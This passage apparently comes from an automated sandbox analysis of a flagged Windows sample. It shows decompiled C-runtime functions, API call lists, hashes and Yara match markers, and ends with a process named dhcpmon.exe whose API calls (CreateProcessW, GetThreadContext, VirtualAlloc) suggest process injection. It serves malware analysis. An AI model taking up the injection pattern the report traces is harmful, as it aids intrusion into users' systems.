						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                0x0040822b
                0x00408232
                0x00408235
                0x0040823d
                0x00408241
                0x0040824d
                0x00408250
                0x00408253
                0x0040825a
                0x00408262
                0x00408265
                0x0040826b
                0x00408271
                0x00408276
                0x00408278
                0x0040827b
                0x00408280
                0x0040828a
                0x00408291
                0x00408294
                0x0040829b
                0x004082a2
                0x004082ce
                0x004082f4
                0x004082f6
                0x00000000
                0x004082d0
                0x004082d3
                0x0040839a
                0x004083a6
                0x004083b1
                0x004083b6
                0x004082d9
                0x004082e0
                0x004082e5
                0x004082eb
                0x004082f1
                0x00000000
                0x004082f1
                0x004082eb
                0x004082d3
                0x004082a4
                0x004082a8
                0x004082ab
                0x004082b1
                0x004082b3
                0x004082b6
                0x004082ba
                0x004082f7
                0x004082fa
                0x004082fb
                0x00408300
                0x00408306
                0x0040830c
                0x0040831b
                0x00408321
                0x00408327
                0x0040832c
                0x00408348
                0x004083bb
                0x004083c1
                0x0040834a
                0x00408352
                0x0040835b
                0x00408361
                0x00000000
                0x00408363
                0x00408365
                0x00408368
                0x00408381
                0x00000000
                0x00408383
                0x00408387
                0x00408389
                0x0040838c
                0x00000000
                0x0040838c
                0x00408387
                0x00408381
                0x00408361
                0x0040835b
                0x00408348
                0x0040832c
                0x00408306
                0x00000000
                0x0040838f
                0x0040838f
                0x004083c3
                0x004083cd
                0x004083d5

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                • __fassign.LIBCMT ref: 004082E0
                • __fassign.LIBCMT ref: 004082FB
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x8da58853
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                0x00403639
                0x00403640
                0x00403643
                0x00403647
                0x00403652
                0x0040365a
                0x00403665
                0x0040366b
                0x0040366f
                0x00403676
                0x0040367c
                0x0040367c
                0x0040367e
                0x00403683
                0x00403688
                0x00403688
                0x00403693
                0x0040369b

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x8da58853
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                0x004062c0
                0x004062c7
                0x004062ca
                0x004062d3
                0x004062d8
                0x004062dd
                0x004062e2
                0x004062e5
                0x004062e7
                0x004062e7
                0x004062ec
                0x00406305
                0x0040630b
                0x00406310
                0x004063af
                0x004063b3
                0x004063b8
                0x004063b8
                0x004063cc
                0x004063d4
                0x004063d4
                0x00406316
                0x00406319
                0x0040631e
                0x00406322
                0x0040636e
                0x00406370
                0x00406372
                0x00406377
                0x0040638e
                0x00406396
                0x004063a6
                0x004063a6
                0x00406396
                0x004063a8
                0x004063a9
                0x00000000
                0x004063ae
                0x00406324
                0x00406329
                0x0040632b
                0x0040632d
                0x0040632d
                0x00406335
                0x00406352
                0x0040635c
                0x00406361
                0x00000000
                0x00000000
                0x00406363
                0x00406369
                0x00406369
                0x00000000
                0x00406369
                0x00406339
                0x0040633d
                0x00406342
                0x00406346
                0x00000000
                0x00000000
                0x00406348
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x5f7e60
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                0x00409be4
                0x00409bf1
                0x00409bf7
                0x00409bff
                0x00409c0d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00409c15
                0x00409c15
                0x00409c17
                0x00409c29
                0x00000000
                0x00000000
                0x00409c2b
                0x00409c3b
                0x00000000
                0x00000000
                0x00409c43
                0x00409c45
                0x00409c46
                0x00409c5e
                0x00409c65
                0x00000000
                0x00409c73
                0x00000000
                0x00409c6e
                0x00409bff
                0x00409bf3
                0x00409bf3
                0x00000000

                APIs
                • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                • __dosmaperr.LIBCMT ref: 00409C68
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CloseErrorHandleLast__dosmaperr
                • String ID: `~_
                • API String ID: 2583163307-4261284399
                • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x8da58854
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                0x00405756
                0x0040575a
                0x00405761
                0x00405765
                0x00405773
                0x00405789
                0x0040578d
                0x004057b6
                0x004057b8
                0x004057bc
                0x004057bf
                0x004057bf
                0x004057c5
                0x004057c7
                0x00000000
                0x004057c8
                0x0040578f
                0x00405798
                0x004057a7
                0x0040579a
                0x0040579d
                0x004057a3
                0x004057a3
                0x004057ab
                0x00000000
                0x004057ad
                0x004057b0
                0x004057b2
                0x00000000
                0x004057b2
                0x004057ab
                0x00405767
                0x0040576c
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00404320
                0x00404320
                0x00404320
                0x0040432a
                0x0040432c
                0x00404331
                0x00404334
                0x00404342
                0x00404349
                0x0040434e
                0x00404351
                0x00404354
                0x00404366
                0x0040436b
                0x0040436d
                0x00404378
                0x0040437f
                0x00404384
                0x00404387
                0x00404389
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040436f
                0x0040436f
                0x00000000
                0x0040436f
                0x00404356
                0x00404356
                0x00404357
                0x00404357
                0x0040435c
                0x00404397
                0x00404398
                0x0040439e
                0x004043a3
                0x004043a6
                0x004043a7
                0x004043a8
                0x004043af
                0x004043b1
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c9
                0x004043d5
                0x004043d8
                0x004043db
                0x004043ed
                0x004043f2
                0x004043f4
                0x004043ff
                0x00404405
                0x0040440d
                0x0040440f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004043f6
                0x004043f6
                0x00000000
                0x004043f6
                0x004043dd
                0x004043dd
                0x004043de
                0x004043de
                0x00404411
                0x00404412
                0x00404412
                0x004043bd
                0x004043c3
                0x004043c7
                0x0040441a
                0x0040441b
                0x00404421
                0x00000000
                0x00000000
                0x00000000
                0x004043c7
                0x00404428
                0x00404428
                0x00404336
                0x0040433c
                0x00404340
                0x0040438b
                0x0040438c
                0x00404396
                0x00000000
                0x00000000
                0x00000000
                0x00404340

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 0000000B.00000001.289566409.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 026601B8, Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.306486737.0000000002660000.00000040.00000001.sdmp, Offset: 02660000, based on PE: false
                Similarity
                • API ID:
                • String ID: fY$fY$fY$fY
                • API String ID: 0-2140916642
                • Opcode ID: 7d9ede0492ec5e5435d66e8166e00ec79074ca6a2b732babeeb658ca5a7fd77e
                • Instruction ID: 661400943b55dc938f02c0d6170c3a93bd25a2048ae6e07fef34ee95b95c3959
                • Opcode Fuzzy Hash: 7d9ede0492ec5e5435d66e8166e00ec79074ca6a2b732babeeb658ca5a7fd77e
                • Instruction Fuzzy Hash: AE211A707012159FEB208EAAD894B3A77EAFFC9744F500469F6069B384EA71FC058B64
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: dhcpmon.exe PID: 2724 Parent PID: 1104 dhcpmon.exeCOMMON

                Executed Functions

                Function 6FF754DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FF755B4
                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6FF75262,7FC6FA16,6FF75421), ref: 6FF755DE
                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6FF75262,7FC6FA16), ref: 6FF755F5
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6FF75262,7FC6FA16,6FF75421), ref: 6FF75617
                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,6FF75262,7FC6FA16,6FF75421,00000000,00000000), ref: 6FF7568A
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6FF75262,7FC6FA16,6FF75421), ref: 6FF75695
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6FF75262,7FC6FA16,6FF75421,00000000), ref: 6FF756E0
                Memory Dump Source
                • Source File: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                • String ID:
                • API String ID: 656311269-0
                • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                • Instruction ID: 2d6c38977d2a074749bdcdb3332685ff25bad7973318db19bba96188a905bcba
                • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                • Instruction Fuzzy Hash: D1618071E00718ABDB20DFA8DC80BAEF7B5AF48710F14415AE915EB390DF74AD018B55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF76355, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 6FF76499
                • GetThreadContext.KERNELBASE(?,00010007), ref: 6FF764BC
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ContextCreateProcessThread
                • String ID: D
                • API String ID: 2843130473-2746444292
                • Opcode ID: 967b0ed0b159f7095b4aee75cd24dcf2308fc0388ad5ca128b708bfd307461cf
                • Instruction ID: 123a7da5242386e311a705e617eb290a889317b2fa9dd4171dff463be0139ebe
                • Opcode Fuzzy Hash: 967b0ed0b159f7095b4aee75cd24dcf2308fc0388ad5ca128b708bfd307461cf
                • Instruction Fuzzy Hash: D7A1D371E40209EFDB64DFA8DD80BAEFBB5AF09304F10446AE515EB294DB31AA41DF14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF750D8, Relevance: 7.8, APIs: 5, Instructions: 274fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FF75B65
                Memory Dump Source
                • Source File: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 382459803fe3f09374551e91f27c8c37053ede0e81a9b585021e918ee3f8853d
                • Instruction ID: d4c8d7011b32ae1cf9e81f055d64ab3d89575f9089c2f03ec217ebd166fbf941
                • Opcode Fuzzy Hash: 382459803fe3f09374551e91f27c8c37053ede0e81a9b585021e918ee3f8853d
                • Instruction Fuzzy Hash: E2A1DE25E50348EADB60CBE8EC11BBDB7B5AF48B10F20545BE508EE2E0D7710E909B09
                Uniqueness

                Uniqueness Score: -1.00%

